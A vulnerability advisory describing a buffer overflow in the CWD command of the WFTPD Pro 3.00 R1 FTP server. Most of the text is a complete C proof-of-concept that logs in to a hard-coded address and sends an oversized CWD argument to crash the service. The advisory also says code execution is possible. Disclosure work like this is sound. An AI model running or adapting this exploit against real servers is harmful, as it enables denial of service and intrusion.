COMMAND

    WFTPD

SYSTEMS AFFECTED

    WFTPD Pro 3.00 R1

PROBLEM

    'se00020' found following.  When sending a command (cwd)  followed
    by a long argument (~500 char '.') the server crashes with:

    Which means in English:

        Exception fault at:
        0x2e2e2e2e
        reading from 0x2e2e2e2e is not possible...

    Executing  arbitrary  code  is  possible.   Tested  on win2k using
    trail version of WFTPD 3.00 R1.  Simple exploit:

    //WFTPD Pro 3.00 R1 Buffer Overflow exploit
    //written by se00020@fhs-hagenberg.ac.at
    
    #include <stdio.h>
    #include <winsock.h>
    #include <windows.h>
    #include <malloc.h>
    
    void main(){
	    SOCKET sock_victim;
	    WORD version=MAKEWORD(1,1);
	    WSADATA wsadata;
	    SOCKADDR_IN victim;
	    int sockid;
	    char buffer[1024];
	    char exploitbuffer[800]={"CWD "};
	    char recvbuffer[1024];
    
    
    
            WSAStartup(version, &wsadata);
    
	    sock_victim=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	    victim.sin_family=AF_INET;
	    victim.sin_addr.s_addr=inet_addr("10.17.3.44");
	    victim.sin_port=htons(21);
	    sockid=connect(sock_victim, (sockaddr*) &victim, sizeof(victim));
    
    
            recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
	    memset(recvbuffer, '/0',sizeof(recvbuffer));
	    send(sock_victim, "USER test\r\n",strlen("USER test\r\n"),0);
 	    recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
	    memset(recvbuffer, '/0',sizeof(recvbuffer));
	    send(sock_victim, "PASS\r\n",strlen("PASS\r\n"),0);
	    recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
	    memset(recvbuffer, '/0',sizeof(recvbuffer));
    
    
	    memset(exploitbuffer+4,'.',sizeof(exploitbuffer)-4);
	    sprintf(buffer,"%s\r\n",exploitbuffer);
    
	    send(sock_victim, buffer , sizeof(buffer),0);
	    recv(sock_victim, recvbuffer, sizeof(recvbuffer),0);
    
            closesocket(sockid);
	    closesocket(sock_victim);
    
    }

SOLUTION

    The author has been contacted.